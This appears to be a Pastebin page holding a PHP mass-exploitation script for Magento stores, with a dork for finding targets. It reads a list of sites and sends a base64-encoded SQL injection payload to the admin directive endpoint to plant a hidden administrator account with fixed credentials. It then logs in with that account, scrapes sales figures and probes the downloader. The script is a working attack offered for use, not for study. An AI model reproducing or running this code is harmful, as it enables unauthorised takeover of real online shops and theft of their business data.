Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // for more exploit or development visit my site
- // http://www.d4rknet.org/
- // Dork: "Powered By Magento"
- error_reporting(0);
- set_time_limit(0);
- $banner = '
- ▒▒▒▒▒▒▒▓
- ▒▒▒▒▒▒▒▓▓▓
- ▒▓▓▓▓▓▓░░░▓
- ▒▓░░░░▓░░░░▓
- ▓░░░░░░▓░▓░▓
- ▓░░░░░░▓░░░▓
- ▓░░▓░░░▓▓▓▓
- ▒▓░░░░▓▒▒▒▓
- ▒▒▓▓▓▓▒▒▒▓
- Exploit Magento Add Admin 2016
- ';
- function bersihkan($htmltags) {
- $htmltags = str_replace('<span class="price">','',$htmltags);
- $htmltags = str_replace('</span>','',$htmltags);
- return $htmltags;
- }
- $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
- $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=brazilobscure&login%5Bpassword%5D=brazilobscure123";
- $postdwn = "username=brazilobscure&password=brazilobscure123";
- $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
- $pagelog = "/admin/";
- $pagedwn = "/downloader/";
- function stupid_CURL($url,$data,$page) {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url.$page);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- return $result;
- }
- print $banner;
- $get=file_get_contents($argv[1])
- or die("
- \n\t Erro !
- \n\t MODO DE USAR ---> ./Exploit.php Sites.txt \n\n");
- $j=explode("\r\n",$get);
- foreach($j as $site){
- print "\n\n\t---> TESTANDO SITE : ".$site;
- $hajar = stupid_CURL($site , $postadm, $pageadm);
- if(preg_match('#200 OK#', $hajar)) {
- $expres = "SUCESSO";
- $ceklog = stupid_CURL($site , $postlog, $pagelog);
- if(preg_match('#302 Moved#', $ceklog)) {
- preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
- foreach($match as $val)
- {
- $ltm = $val[0];
- $avo = $val[1];
- break;
- }
- $admlog = "SUCESSO";
- $user = "brazilobscure";
- $pass = "brazilobscure123";
- $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
- if(preg_match('#RETORNAR ADMIN#', $cekdwn)) {
- $dwnlog = "LOGIN COM SUCESSO";
- }else {
- $dwnlog = "LOGIN FALHOU";
- }
- }else {
- $admlog = "FALHOU";
- $user = "NULL";
- $pass = "NULL";
- }
- }else {
- $admlog = "FALHOU";
- $expres = "FALHOU";
- $user = "NULL";
- $pass = "NULL";
- $dwnlog = "LOGIN FALHOU";
- $ltm = "NULL";
- $avo = "NULL";
- }
- echo '
- +---------------------------------------------+
- | EXPLOIT : '.$expres.'
- | LOGIN ADMIN : '.$admlog.'
- | Lifetime Sales: '.bersihkan($ltm).'
- | Average Order : '.bersihkan($avo).'
- | Downloader : '.$dwnlog.'
- | Username : '.$user.'
- | Password : '.$pass.'
- +---------------------------------------------+
- ';
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement